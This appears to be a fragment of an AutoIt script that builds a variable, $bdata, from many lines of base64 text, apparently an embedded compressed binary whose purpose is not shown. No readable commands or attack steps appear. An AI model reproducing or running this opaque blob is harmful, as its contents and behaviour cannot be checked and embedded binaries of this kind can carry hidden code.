	$bdata &= "1LAF9TVUJMQb5fQ+0CoKIoll9UU0dpQK6u4juuOKaubmVzmChUYWl31gH2rqQpX2JpZzVvU0lr3tRNHElGSZ8x2++edlSPUFJDiWdiMjMxMk8bMqP1QlVMRyYUgrdW9PZsZ2Zp0gA3VUsaNXn+Z4o3VWtyYWluIP9AeBcUS0lTSHpUdXJraXPZzfzIaAAtMTI1NE9IhHvYgchHJt9HODc0j9zOTz5TV0VEU3dlZC9MjJ4JAZD3U2xv8Np+uxUvN0FLL2FrJ7D8rIOOQV0AUm9tYQ43WNdPUD5VR1VV/Gd3WwxaSUxVAFBvcnR1Z3W22gs+PULEemlsKWfHbhbY2iFvF2FyZvAGx09MpEZsnZ8WXIE5TthH8ARPSw2J5bAXMQpOuw8GzW9yZ3gcb2ttqH+0p6RORFWKZxkGKkz0RHV0+icWjF3XvVaLHnB2indtg1kSIHBBIW/DAgxMKmh1Yzci4QmtS8ouSyQN3yR1J2tqXzU2MDGfwGA"
	$bdata &= "PbXpBhRl3IBZwZvR7EeRBnmN5KcdIVU5IdW6ZwCkl4Gp5ccsqpUNUdDVvRSx0t1VWRW5lYnIKpA6mdb8HRiUG5mAyFxlGkm3TBAYwDA5hZSk3hvyOophO1/8/RmlubpDfsbSud0VzdG9FBeRa3zd2IupOWI1fTU8QaCm2u/sFT3BhtvgQhCAtLJQeAuBIIFNRyq99TimPRU5HTLv8Wxt4IYdFbmdsVZQ4TkBTdCwgRthjbKYWj8pFSy4YkIngZWVrTzNHFFy7KDpN3xlHEG2MY5FZPQ9An9dgBxN9RHWnUrZc+Y7nQ1pFQ3pl77QUAbkw1O3MrCpoQ7JBVRlBADEeCqB4AEEmjGM8YRl8jQLyIBthEYDDQ67nNkpBsKYBlE+RSmFwYadzTSCypWbuVu9hVyprRx/XlJ+iqlOlAFJ1c3O/Mf//3xt99zONWM/OEaidAKoAbK3F0Ni9xW7SQzEeeR6eRGxsYFZS7MDEMHpnC54JYI1QQCs1"
	$bdata &= "ef9ZQG6YvEQNAQHF4o9k1KMuAUTbGQwmHAUEZoRpbSctoNastR8/EvBAwI9F7C9pIXPOVUR3bUV4PAgzB8haQdZ+0udWn9VBZFc+SXPAC4IN8HBveIQFAfeBr2QvPS8g8AJXL1Rl2OzNZqSqAEVCdWZm2F5QYbDYAS5nQihuKxgILCDfAkcBZi/wMtDk2q0CAs+qLyLtgMCJH9iFpj3RH1APexwEQsFHT7srAS8j3S91coIrWHOtN0xnHkmltBGsd8kE2MWdfuojP0dbzT3dNTdoZ0UE5sTaNwAfXRC4BO8ReQuOBaw/dlaOdWUEmUNrJ95iRSKYdv0nbwfyHFsjsBeiH037SLswjGhzH5V3gsB2TFA3nzV7SDsbT1J2Ly1PcJ7DXVOUuR/B2iIiGS9lYLDB2h9MP2HRZkUlHwVrYRrs0ycNb/ASvQUFT6EzQkUTOMaqZHNHgcVWBFYlqdKPFyB4bHn7hWl0vABPr39NZie3N3OO6iQOU"
	$bdata &= "2ARXCBTL9K8hyhiBqxynec9r5QW0IAeZDyzed7zFgqQJAYUAHHsvvM8z9jIuKhGCkje87z3BlwWgAZwWEQmNNk8T3cHJBQIcPi8957n5NCwRpwOoC6E9zzP82hINGwkBs/zPJsIb/jczLykPM/zPIx4ZFRA1QS28yheBwwWElYKAoPw5gVU/NXFBEF3YSMDExND6nYVAdEuMmRBJG3DBjxot5hTdXDqmsEENJQzQ5SW2Cd+cnlXG4sckAt+c/wIiDg35JIHsuiYdAjQFIyQK7i+ZM17Y9sU9AYWM64WfRUlz7O94Q6CNg0s+lDjkLx3gBYANm1DTyO2W4Gipd/MDP8pJ9neDdSG844YjBfzyGTIYd8+I21zVmTEmnlnDiQbZwYekbrom60fGWY6XMhcdmOgCebvFnMON2xpYpJwu85eSPFzcgYPYYVfc2Z7M8UuYzCPcH7qBuPCCTQ9zyAlelQAYfqZgJ0MdhxDdHha12JGzyNubEpz3T"
	$bdata &= "YR2B23HVc8z7aZt/Ajhg4PPMuIlc3m2SUS1CdRECBjbhGE1G9tOPsA3YF80i5wZGxnwH9DHFqtTvIeB3QmpQJaJ39Q9nacyE+6JeYePnYopDeGghy0n3ZwEet+s5cBQeEHODdLiy//AAsbed4QLhBAL18vuICRpx87nt+A1zWEH0FnmICTmDJrBiamjk9cnVzfuBAHFx9cumOmEFNf0FzzlBN0vMdSdY4ORA52x1IM7x5gDHB0Mi5OGtkXVBHMblZpc2MTFuEUcF+6skZzSDBwJweA7ibtBSgwex/Id4RrQNusda9FPGlGIZfq9VsxQ72WUGxhrEpqgTOoFoSLFvAT3M9STXJ1ccfDts9DAI4YISU7cWbq6DMgUHpsXLMHkbVEiGtw5DJv6qRaI1pBTOphegDnR6Oe0KFVSUyQdVzQake8N/wztKKBZT4CNzRwiqq2cx8RECAPJXdfAzo7Ay07yAPIAwMy+AMvyLSCawVfVLxr1NJjBF9"
	$bdata &= "DQ2hUyuSFLvZlY09oPVgo7ycGedtQe7ugyGwGcF//AUuIeG5v4HQCWqwqtBCvlhQfCCsbxL8ncOCsqewABpekIJ8RJzBbV3yfPdvm4hEkXsg+Vw5AMcx6mwx4/7t2qFnRQtQPdmxeQzq/EBDrTl9fQg3jHTkdP0bbQprWG5lgVIE/Jxe4X8MAuEwMQwKfQWZ4q013fiI4MHMWnRKB1MZ7JSfUEQ7C754jHhlPcnrbNhHGb9p1byfd8BfuZLRiNDIzNyQ8DI6zBntshmcDcIAd4IyAVn5wsC8FdiB5RKIqQSfu3TIoncRhAGMCUA5t5FK5ZlBUHCevg4GuRmizZBJvntst2AB1NwCHTm3eGRh2H1YubmX8GgPXR0S7Y9ZpAHDOwLX3abJuP1KKwVoD14dTD3SH8I7WzkhGcB9UdnDcz201XzdLeQBiMq818Bq/ZJ5oR3Q2dXZwdwWfRioj5PfBKni3rgZjT49ttdeuZhZibDpBR39h7XJt"
	$bdata &= "z0xhWylY8KZ3diZn27cO9g28aR5U7/9vAjMtCgdvEptn8xaeZK4G9mU+jFssebb3PEdhHugGZjaE2TzP5t5nOJLsaEbzPJvnoPppV7H/8zybZ2pNp2sBZMFv855nbBVsxuZMbSAGaHrP9jyw/t5uTGk2lMmD3NrPA4MHA1kkWCgIFAZ8Qyh5oA8DWTVu3y02Xqheq48H4DaHYT3/r9QNHBGBDA44m3HPnX16obcZQJBhdfP+MSWCaIRpgGb0Y/FJzhvtUnVAbd6vxCd4h5dS9dp0bWxI249QGprGaGhjMmwuPO/Dym9jBxZuiMUGnZO8Z3sWNoco1S4V+KcGu+edY/Oxgj/vFBQuXjzPe54zQL0G3o5WPM/m2X2y4X4QUJDneZ720B5/f39/m+d53oAYBliHtvaBKM7e8zyAw/meJweId2bhijCOBM+85CHbFuQAgTREEHwWLrYBBDnAa88QtWEfRlVYWWTXmBwMECkyrQbozk+BmDgPB"
	$bdata &= "XLBFl7gMy81XCAXyDQ2MowFcoE3LuS2mk8udx4rLmIfIF+DaCx7OxmPIxfy5Qh4SDkvpREamdghAV8aCLhAbqvPLnfnFS2Xi50gT88vLwp7VRAXyBAugk/LyeQtXnRyEAIeDuoD5H1bFYX0G99yIRekHoY6UwfIlwv5d0EaLZYXApYqiBM3bn8usegA8mSFfgCGhakdILdXMQjoXn2IPXev1wVz7gFjhkuEsw4o3GeqHGoLKTBfUmcXmlp2IZUOIUMQj2zH8T5QZUdkaeA+0H2LFstEQy+Np9gFTRYKQ1ugFeqq7y0nhZCFSi6E4G/UK6Q20MwQRwOhdkA+kP6EwBSFLDc89gq5tKgIp6If1ybkhaAIgDeYcoVcIZCIhEfIFYAHFguVOlgenydGaic2wpU8T3Qth8gQiuTGDwOlwgS170xv3Gamd/+hSJ7nFyw/k+pBwqZDYQeNoBAeL230SW+zCdhOJh1OAEJ0lDEBP2ae53kvXxQGEA"
	$bdata &= "wIBI/P82yH+Ozk3ARXHoVUqQeFFsgTtReIVBDU2mwaRnynx6jIp1/LVXmnzU0oDVRvLTi0s1AOj6AcrzMQzaaOzLEysgcYtxVUthiGuaFX3mSDh3GbU0jkGGS9DAbK5ZYBLwbw5IHcOR9viSAUjOAY2Sy4sIa/O8NNwfHaYgvsFNoGFQ4WbLa3+QZNmL4oRjYOwJPy4x3ZvPfwHkEGvOXHvw3e8zbvdqkG0vDspvxpVjSQDTfBxkoEGSdOwg5HcEn5BBktt2bgSpr8aWxldHh0mQzISR4OigDGyUOJ0UJAuRYgLDsxnORWJMhpfxlQJhgIZcFWRsyML4qpu9YzQvfBAXjWmm+4fx8wIgVYkDIjLYAEgeZOboPDYUjk3wcEK+SSSwgE2GqrbW93rwchFmgrbwGm0BaxBC8B7peEI+SKwCAZR97mPZsG1JFUHujNWAY6FZvneUlvhtwlpt7a9AKebNWOG9k8Qn4ejDAoGjjmnsgpObLnBeP"
	$bdata &= "P+AfpeZ7t5SAG5CIccMHe90CnH+XC5+Ve5c2Oo7yfgPcGsLbnf+PV1ohRC34Tj+l27oNDQYIQctXW1ozUEE/Ikc1m1PDx9g7yDO/IqhP0P27xu/MVFjDPe+95HnB9BrA+AzZWwK1EVFZvHzCAAUbZV0oK2QALVVeNkHDLZnMa6Ps8/B5mjpBvIVluzBQbV6BNFD4Beo5Lb7i5JVZzZze4BrAuf3eGgE4fSExQD0NITU9BACiHdXhkwZdB5GF0YTeDp3i/FPKOaDIEDxkGQlgOBDQ3Y9ZiEX2ruq/JjqwUt+1Shx4cFO71X+k9m+cOOocdPu0G5UXbyRsuFt3lL8ZCmLdBgHlQkY7c8P9sAuoGIftoTVNXSEVFTF/0/7YgrBZHAEAitBpwjM4RlCG7zYSbtmK+V+Zzdx1gLODZNiKbBiSBBJbwIFzFIAYg3FNX6C4gQZI3KDwLyC/MYVoHCgtXSVcXFhKWwo98IFMYNqAxqyCCY3L4W8us"
	$bdata &= "JT+bJVdz24YTAEWUZWQZjx9/bsvuZCRxf2OWd25lcn1BwWYVAO45G+hTaSrtGCgOHoIcFM5gtkodQQQlMtAPdq3CwFxD0EQQMRdJbsgWQjUkdNw3oiAwC2Y2HC5MqMJctKMka9ocKr6YSmJcqCYfgN0Fmk+aVEIYq3wGv9FcNReQ1hlQQ/0yP4ALCm8KnmMb9gW0s/iuZcNHd68hsHVTvULAaL+CazdWOywwLDI3aA8K5jH4N0zXBkH7L0E8EHvtgVRUeWZc1jQ3RiAgzTM2Y7UPlkLEQiwlNze+hsTATQj5ADMGwZkI91CxQrDC0p8w/bgMa0jsPyOn9peQCg6NF7+ZwNaCpyU5nuc9lUKXBpBMBmBwwDzP82yRIDxYcIyFYCv2xFdP27NpqacG+JIQIG/23vO8VAaYzOA+BAaoN9u7pI0u3EzHR60l2mp3RydIQaDgrw9ONOcdee+SWAbkDoSTGAYkyNnznjxIJqxsT5MA1UEu5JMAX"
	$bdata &= "GJhtDgwKgUab+kUFBUHH6YEbvjHEXC/lFZja0d1hVpwUmhUsKj/nPAER7DXBkhIOm1tOq97fj8vZAAsIE0gEXkAAPsQrmkWLy8QDk0G+HI5TkEcrqRyHDj2G4d2F09aEsMU6BVTcClB9hwfUNgaSn6HDlCpLoxur0rUCQOY3YZNYe+eIBsIVkBHTBXnnHPuzr+vp5ePh5lzzj1ueYd/d2dGhmfuPiJyZDCfvBMA3pt9ayRzJ1dlZPgZVHUTs+33IIYhU3UPhnfCOeecb19PRz9OLQHgdbzFMSActcyYoVDDjIdvKmnCi8BKlzYg+Kaw5vfAM4gMhazIMDqsEMJRcmJUjlMbDCgsjDyvTE0I1h3+NCRw+wfWI342MDM0GEFuIP5ERjd2bM8gaGFzIG0Oz1wAKCgudPh+OCoqACAWICQydGg+KQzbLEMg92yvrA6UFOQucvi8eglXLC4KUNcg1IV27X1QdGO7J7ZzwcHNPtMyTm0gZnhtqM"
	$bdata &= "FwUbiGjS4/NwU3AzMtIEENdbY4uG4DAkzARGYiw56KXMRpqgoLdQgeTADadfAO3PPAIG7/S/8/tghOuZeCYQR6ClRfGtE5vgYlZXIgYhYeRuyBQATIVy4gSeTcA4fgVD7o1mtluh9ASBmd9IAgb2YeHO5kulLYUict3+BAF/Bw6E4oL2NsciZwDYIpPFBjk09h3UxhCiluQSDQISTeBDnO/GlYW3lw9+8ybm/MZQgPDoEWPGggWghdMAyGVjdsYV/iCBYyMfdls8E9nHlSVN8YaHSmhiAFQy4fNzC3a4N3kz7BZD8yEVgQlTh1WQXBzJlgAp5LTzfHbVHYFXfgb28V8hEyNnN0ZA7jwco1cHX6dmla9yxSYUJBk1G/u2pHSDRfVGUiL7DwmBE6DSC3vzE5e6HCRO9vstdvHi3XDsJkSFc4KofH6ZpwbmIzO3tcyLdHN23s6kLrYQELC2tfnbGlGC9ptmij6uJcDeXpRHFY9eMGkNBTUsk"
	$bdata &= "8Rh02kCTQaXboB5UZWd/dOBCBHqyAandh5YYwOcIWNkIgalRGSHdLgFpXOKwlIRTw03OvnhigcjJmiByN4E04CAwthTs6wIS9gwAYw0ORPUMrKx+zAjJZmY9aIgs/rEw8cLvdHp5EUDRroHduPsxai9vuZUVNIVpQTToktIYvwC6ieMp0YGAYwGZFLfxgI4zGTh9GbHNGJlRwCuYPBKxwyTs7FkdBXBX+/QTPE5AG6AAEs/5ug67wW7wOshYABVL/pmUFtxBaYx1uqgLgnim+KW0omIQUBgWS0AyIIEgGh6G0FzQERQAFtIQb/l9QUSA4UFgHCAA3nldQBySy+1tYIAjtYGhgABBQOzPvM6AIByoHADQCrYBFuBzWY3P9VQUF0fZURi04D2C/KqMSwq5DjH97CEK1BlwJCgsMDQ4P/////xAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vjP//ReAyMzQ1Njc4OTo7PD0+P0BB"
	$bdata &= "QkPLkP47/EdISUpLTE1OT1hfROnOVLBYWVpbXI6Gqk5UYDBjtGZQOyys+Glqa2xtRnBx1HV2+3fo/3d4eXp7fH1+fwA9JYCAhoCBgBKZ1nBzEAOGgoAUAkUAhRC8wGyQ8oBQgIiqDgahaRYnVwwZDJk92FBQIhooMHLIb2jmBQIACA54cHB3cHDhD2kfZSswAADAfgFQQSIj8lfUgP//R0FJcw5hNoBY7lAeGv+f2jMfAfA/fwI1wmghotoPye3J7OU+QP/vf0cQmMAPXYJt20BnP58PgHbkyMvA7wCCgETABy9y5OT3zO4PQJFXAB47OZs9wOXtb64PwHdBH7uNPHIMQNjspA9xHyOPHDmAPwAOQN3rrSdnJ2cPgH1OH0Ag8tuTI7PqD8UAmW3q/0bO3m4PFk/s6R/C6Zme3G5HAHEvSB8h+ehnJyNH0+ishw+AYV7ebic8LxgP9OdA0CdHTk6tisBnRWZPzm4vJA8AA+Lmr8FHjtzOD"
	$bdata &= "0ChH4EAYsBCI09uJyRfBeflySMnZ2cPAKwfwI5yQG8nt5NVOS8dAW/m5CNnbyPKD6/kP5XkeydHbidgH0eALRTb5ARvD/vjL+LjH7eTk9mx4z+ZgWkvUt5OTm4POyQNT/biu52czW/gDwDKtC+eH3ZyOznAiHMPXklP7O3k5DQfC4/34Q/kyNnJ488fQLvAp5OT2+2UP4FfbluTk5OTSDUjEZscOcP/4E/t4NvgL5Pb7Xa4H6Y/lQ+EJycnt3NvYlFBMOzcbicgLxAPAAF/+/9H0mH0/YY/9/bZRvyePD0eejEl5pY/2z////wUVmQOP0WSl2IaoT/WNtTXXJJNH6AB+f/N/7umP3DbOXRemTyAXGOzTqw/CdbKvZKBSv///v8zgIvqsD/lGy+UlxdOXqli8KmzP0RaFS7vETDgK/9/HvhPaGW2P68/qY3yhF0zvBm5+f/tF97+A+2CYCS+QMDXuca7P1gmZULot0X///z/3OFycr4/XK"
	$bdata &= "IzI6kuwA6C14zAPwYCtBHFQ/+D/781HjM6j9zBP0x0bauMWV5Aryd6K8M/se03//wiZf2hqwd0TFZ2xI+bJJ/DTR5g/v/5/5BkSMDFP2g2X37UxSh476QHxz/45h1Z6oZP/z///97D+llMyD93SrFR01xDrGpVjsk/EO5W0Yj/8//bHDR+4CsDMM/KP2WRv94zNy6uEzINzD/tG/z//eKLsbwVSx7W1vlJzT8pLaHCV7W/LYr3/+//yYPOP/IYDdH1KkR+luNEvM8/N1RmKPmzRx7Nb/j/NgnUeNA/AlkSCPbxOH6QsiXOEtG62998+0UPHIU8HvDjdwuso34ECxCXPz6w0n/75/+QpUPSP13U6eh1m1CTrVfbHj7CiiP1NPnf/3dYsJS+WHHTP97040LRFkpeX0R+8+3/hAbUP238+0uhm0Ye0Bih1JqlzAJzN8359v8dXxHiWy3VP0s+iA9kgzoegIJn47/m/5+/Wn3qPVx1SXOUflH"
	$bdata &= "WP8RnOiIoik75j7/5EO+SJ+I5kH4OJE8xXtF/2HHXzf9vv27TMa+KJR5wKWuLANg/dtnKjLgFFmD/b3/zpVg6jt9xLlf/lyCeUGme0RvZP2fG9uQ+X/ntz7tNvqtbqB7WsmEKmojLX9Iz2v3t7zeNLNl1WE9+yY4vvh6DzOKQMXc8tz//v17QPidlSNs/YB+eCUq1SngOftAeIM8N3/z/8xzCiiZuumBZ3D/+gcuWvbRDMJGLFuH7//c34hldBaOtLz4jIJln3T8EdeiWUO0YHv/N33zA/w3i7KqK7Sxs4kPwNa3rcd4/4ZXtb775juAJFgFARNOz9voUFi1bs0DecO2Nvvl0njR635HZgXBuH4yebP0enfib3v5phi5FZ/o8fnl+qT/e7otP5xJeJz/6zW8+KFSNdIDgCs54O4w73s9QFsFj85v/4D+lUhHrUhdGgLEmCAHh0gebv/m2TqNOHuhK3cxAwdJ+GdrKH0h0m2/+5j1jgEF6"
	$bdata &= "4AcXVSKYjm5Cv1Vf7W+++QVs/2o3oLNd7/1x2AGF3kJEvhC9/fn/IMhoPOI/eqUpkXQMJ1qgI3oephSyMOP/H1QsTJ41HJ2P2r9TmE9P9QRGvf+bv70+464GFR6AjLLbk/9EMKWK5JrZv/X9PVvafPMA124OIN9XOSF/P+3/3yaaGD4+BIoiqdi/g9iNzyC8SR7A/zd/81G/bjCWBUhuJshFkH8FOrjXv0U3RJ+bv/nm9/Q1oPw3pkENGPCf9CVAQKrefPP/55nL1r8qAKfVWitB0FPo9VSnckqM/58SIpw+05H/39W/lbqQ07/97e9OVD+edzOZax5y57oxwB05fgCDXZ/21Pu3P/+/Rq5L0m3zOEMhYIMeMXkymlmc4Ly+4r/ffA2KuRDUBOgoPGoVXgbkg53Tv9u/i0mkQxZ/vnC1+BUsHjGSN/+/+R3g4m4N8JEIHLrSvzKmPWwHlTcwoK3f/v3N8klPlrX+CXgqfpBsQNnRPsCnP"
	$bdata &= "tdG//3Nt0UesE/TNWmkhI00xlEh/j86CfvQv/7291UmCQCsrCu+2oxYjB6h33hPLMdD/9vf/n70jCIdHkHlE8hyaTyeoHF+ql/Pv8FSxW/+f/MgdhU9wD0JfobOv8D8//OmbzZAbf5Q9v+f/6zNvwkgj7uEZIA+6JjTzL85yJLkzfUFHm/+/P/gWx1c/Mu/OLVCDpCEJ4P7oCa3aR/p//f/75lbSr67Wu1Pyr8fxmKAbpdFfkTiRX3JvwLNv/3/+1VnYxxAPkgJranIv1Va8mS6iUweACKkINXH+5s//789pQjQRGohf8G2BO7WVm2AOkE++n/+f0C2nGAzxr8cwX4XJfEza/+tY8W/wyKU/781C35NviD/gqWVxL/0nnATk70+CtDxPykltsbDv1wiglRC5pv/3x7g0mp4+cK/IzZIwohRO2B0AvMt3/UP/j1dUMLjSDA+O1SMYcG/Jraj1rhFxb//f74mouWWwL/2YS0jmN5LPlZcC5"
	$bdata &= "y/fuf/D35ipbeDNE0e7pKUCL6/hn/V/IlVQPj/+/9Y5bp4vL+XwYcDHTU1Pvb6i+y6v0QO6qvLE+Df/3e/aUmyXrm/R9eZsvonN56gQZPUt9//P7/+qve8+O5Ok6o8Tra/yj4eA9KqMT7q0v8fv+FHxrSeT1wRxEPrnqKUK0KzvxjjZ/9++/c6SRtCvlrPdbyx3oOeE7J9TV7c+Kg6sPz/+6q/zK/pITEVvo/0jm6tv7xddlE8KTjxLf7/aNe+b6q/JNd822Ycn4LB/Xinz/+/355Tr/KKNzQ+VSIuf6S/zW3Fk0ZCKjb9//P/pUmCob9LU99fDRtEIO41G52/TfK0LbcfQ/9//v8eejF9Qpe/k7ADS/EARxAN0mORvz/jT2a56CcF/J9G8EwfLIe/c+XQOHzzb0kr/nhtxAl36c1WumO+k9lT3D9A/+8P/pOTk5P9/Pv6k5OTk/n49/aTk5OT9fTz8pOTk5Px8O/uk5OTk+3s6+qTk5O"
	$bdata &= "T6ejn5pOTk5Pl5OPik5OTk+Hg396Tk5OT3dzb2pOTk5PZ2NfWyZGTk9XU04DSycnJydHQz87JycnJzczLysvJycnJyMfGnJycNMXEw8IjL4+cwQAQ8MAPgOTkLSdAPg8O5OTk5A4ODg3k5OTkDQ0NDOTk5OQMDAwL5OTk5AsLCwrk5OTkCgoKCeTk5OQJCQkI5OTk5AgICAfk5OTkBwcHBuTk5OQGBgYF5OTk5AUFBQTk5OTkBAQEA+Tk5OQDAwMC5OTk5AICAgHk5OTkAQEBAMSWk9sPQAAB/1H/P4B8KVAhP1VhMPYJCSGM4CszND8d9/+H/vQy4IxRCT0qn74/Pzc7DFe8yUo+/F/5/2CjN6VFP4avJ2EAJUPLTWtLP9YqnrwfYr/5/2++MBbJmFA/KgitLOx6PxBkAnxTP3//7/6+S6lUJ99Lv9FSX1Y/7BRil4nwRp5wXrpC7v+V/1k/itT6/vRFJg05Jlw/f/Tfh8tOOT/5//f/"
	$bdata &= "4M4JXz/frUViMl1BnvjrvfZgPxwSt9VmI0n/f/7/4PqfaGI/TzKQF0hgM6CdjdpjP2Uyl7dh/v/n/58x8NSGTGU/Mr6CvwJSTZihi75mP0H2f/7/+TMajV86QAScMGg/W7yDMmllT7D9t6Lv/5X/aT/eHDFyoAVLjt8Uaz+EgKOEzqMt/sD8//P/txKHbD+85PnMiFs40HlR+W0/PrEefFc4Qf8///+I1Ztrbz/CPhJx3bJO1OX4bnA/eiABbXvz9/+VDXSuKShxPxBtLPVT/kQeAEVg4b//d3+RlH1lHwM/X6mcmnI/oH1+OmbZRb5Q3d7u/5X/U3M/v9Hf1SaO0N8mDXQ/LCbwmoLc/9vv/vawsXTGHuVl0bROjkBfU8h/dT9e5G808+f/35IwHgjFITl2P+4RV+ipP048B4HyK/9/fyuGI5BHWU1+SBrmq3c/cQdDgInDiP7z/+//UGV4PzASCybbkh8eWLTBHnk/xQK1xDgAFf+/v"
	$bdata &= "/kUPDjYIRcoez3NSL4glrSRev8/P7pkLEcff+X/z8FC1MI2S3s/0p3y6kUJlMK+BHw/d9/f/P2+M4gx5yEetJVMvr/4XhBYLUbemDz+//3m4Hd9HJCeIYVPHqC3eTF+P3wixK/7UTz/8Td/JAcZ67rza4lmB0DehCu+pH/7zT//P5wXumKDVUOQkjQvgI1LX8s8Kh7Nn7/5PJrWdNUGzI14C0kOMrHRdz////xZz1YlQSv8tI4ugT94HytzN8JFOCNv37zym4vBZdPvnWbwfFLoSwVz3riu/PaViVTCOEWC3j0QFLn6KPMhov7mz98eivUpCJffR9YQDv8jRg7Yhw1L3v7mj35WGv1bg+GX1EMT9jweOhDvuP6/wW9r+Vbv9PcftvLjFYQ/+vIX+NVZSPPnb/4e+MHbchRxv+c0JzsuftbPTxdBQKEGkFM3/ohv/n7zJ9Qshbr4qFigIx40vtSJQ8rcaz9/8+fswjdiQtjmxPKsRR1wQ0"
	$bdata &= "K03vzmz/9Dhj8nqzJ4GWs9AhTooMy4V1WbGv8PXXh+X8yRyq12v0u3xlug//zN36E3HpxHz1FlJIts+htG4I7S9XX5mz//v9B5ntSP/EiMZ9SZfIy4x6MlSf/f3/yU0dQ9vrI/AwZGS17wzNPhdL9TJ6Vxf/525QkhIFnRhR4STDh8oBJIZHfNKfz/8zeqm3abIwdMbCbIzXO/gQGpPoqDRPPnb/6YZsFxZ373xzeFKNg3uRXP/z9/jJY2BaN1RSiar7lyv3V2Lh7hRSx0N3/+5o2kXeZMi8N2gU+8EZgBo8ia/vz/89cLcBroJoqlcb9DAIUiNftG9Mx6SfL/529v59Pd5whP1ANq7XC/BKgP+6jyzZ//vHzLV5ENyK7AL07gI0Q1T3//X/n/q88vM/AZXrJvvxSCDEm+riFeYA0x+n7z95tuFKJEsUNFHggiAUKJdRkKXiG/wf9X0FfOiW2/3fm+LS3NML+umNFsv4T+5k/xTrTr8l4"
	$bdata &= "eUCZgGZL3gBHCmUr/n/9/6L4kYWu/qbOIp06wETh45qhqv7JbDgT8+X/lDS09UqXwab95iq5+qh4gyExhOO//3d9bj9msekYr32cagGi/azzz00A4Sx5Iovnz/6PQx2e/fTeD2pLsJQj/gw9tf/7/vYoxJqszXgB7NFdmv/6dtkkT/TgYF+Ke+3/3m2W5T6S6qEHf04zmZL/zX1y8jIJNHv+Pv/lQrzQuFsOzqBo2RB5Aq9l1Y7+Z3nfTv/IE9zLp+MZ7vWK/47VuV71CHv9/f/NgAhsF4C6UcvN9Fn5YXbdMYb/NNk3FnnL4yv+fPNDXUJRgv/HNO8alDnDjzrdf3f/dL/52Duo8gC0/VfZGXr/V9LSWizn/sP8XO/4GGNZcv72LHMyiP/UzZVu/iN27g9/886drPj8gI0r0WSYIBdwtRN7/f7/5UI5ag1j+2DSFSUCeQDdlEle/HMpP/aCi+sr/lS8daqFVv5u0SZls/ZBBaTBUqsDO"
	$bdata &= "Lx5XcQuqdUlKelKf/3+/OBZ8beg6S37AQFZOUb8/fEfCvmQwYDf5/+f/iLpPvzi0zjTY8yCAZljYTL+ieozYQjdD/u/+Xw4d9km/cDQiJYv5SF8v1hNHv9M69QrDV/93/++/YMiDMUS/L7kFE40hP0DZJU9Bv7m5QfI5+f9KmCK6w3jZPL91Kuo2ImTQvB9cbPyOFDe/9Efk35+vjcfvfsdPMT6cTyjPOz5fEesUJ7+FTPGbt3jd2JROvzsZFRcqizJd0xeMgL+6P0BHFfc/jeTIkfYPHkQAQ4BBt9vt5EA+Tz1vOx863E5uJzhvNzYfNDu5nZwzMW8wLh/t5HZyLStvKikft5PbyScmbyQjHyFObicnIB5vHRw7uZ3cHxoZbxcWH+R2cnIUExFvEJPbye0PHw0MbwpObie3CR8HBm8FA86enNwfAgD/FG/9FI6c3Eb8H/r5APhuJydHgPb182/ynZzcTvAf7+3sdnI7uW/r6R/o5m/by"
	$bdata &= "e3k5eMf4uBvJye3k9/eH9zb2Z3cTm5v2NYf1dN2cju5b9LRH8/Ob8nJ7eTMyx/JyCe3k9vGb8XEH8LBndxObm+/vh+8u3JyO7lvurgft7XJ7eR2tG+ysR+vJ7eT265vrasfqqic3E5ub6elH6Sicju5naFvoJ4fncnt5Habb5qYH5cnt5PblW+Ukx+RkLfMtiejFe8PQC6Tk7OToaA/AKCft5OTk56dnZxvm24nJyebmpk/mNxOTk6Yl5ZvlrmdnJyVlJM/kzs5OTmSkZCQb3ZycnKPjo6NP+Tk5OSMi4uKycnJ7YlviYiHk5OT24Y/hoWEJye3k4ODb4KBgU5ObieAP39+fpyc3E59b3x8ezk5uZ16P3l5eHJyOzl3dm92deTkdnJ0dD9zcsnt5ORxcXBvb5Pbyclvbm0/bCe3k5Nsa2pvamlObicnaGc/Z2bcTk5OZWRkb2O5nZycYmJhP2A7OTk5X19eXW92cnJyXVxbWj/k5OTkWl"
	$bdata &= "lYV8nJye1Xb1ZVVZOTk9tUP1NSUicnJ7dRb1BQT05OTk5uP01NTEucnNxOSm9KSUiKXWGbD/8B/5//bcAeuD5Z6ZsA8CJHPaABAMg+Lty2bFdioP/J5kXRPmrbi6liB57/u/9HFtc+mcdeSUwaIx+wBADdPqPNKGmEt8v/3SZJf2gDgOE+Z+bdn1AncD7kPtp3/6/85iop0ftE2AUA5z4D/SayHPlO33gHAPl/95vqO8SdjJdAP0gJAO0+UXnpu3WuM/9X/l/wCoDvPgWcY6G5gS2MBkDxPlKE3aGkOn/l/5U9uAfA8j4J+wsRvntNAAlA9D6GEFf+X/m2msv7Q2AKwPU+YpD335QdQpgLAN3/L//3PqIIdGTpuCQNgPg+1P3hOc7YT9/M5f/l/w4A+j5CvCBOuJpDEID7PsJqnCaD/Rd8+f8UEsD8PuAEgM0uozwUQP4+YGyT//L/7nK0R18IFsD/PiGO7+hsczEMoAA/q8yp/L/7OMH"
	$bdata &= "PFwbf/gxAAT+KECDWEW1OJv3m7r8CP424VXSCUSQfWA/AUGlCjnte/91/8/+YAz9Hdtc3+ZYyH+QRQAQ/ca5s4V17c+X2bSsCE+AhpC5qQC9/ZO//y/8UoAU/0hBMIL2O1BVgBj/rbfzi1wlff3P3/1AXIAc/NU8fZCWZCR+WGMDjiHLw9PvtwS//vzzeKBqACD8qykhnYaDGG0AJfiv/735DupwezEkfch0ACj/b9XOB0+tBKh/9//KbwJIaR1Rpr6IgYAs/iUuf1YuoRN/c/f9fIiAMP+ZEcLJgcRMfTCTg/PJ+yfbv7P+H1180JqANP7INu+EFSB/UJ0AOz/8v/z/P69QXhJ1FKQAPPydQ8AV/yvU83sw7/M0rwGb1NMKxY0Mf+xZAELm7GzCcbns7H98XkPvNlb/vZ0Mgnmk49hjwGBFY2UuSv+buN/wUGlARnjuxDuhSIh83G7CV/1f+oDjOgTM8TGEcEBI/DalyRtKIS15vrvzN"
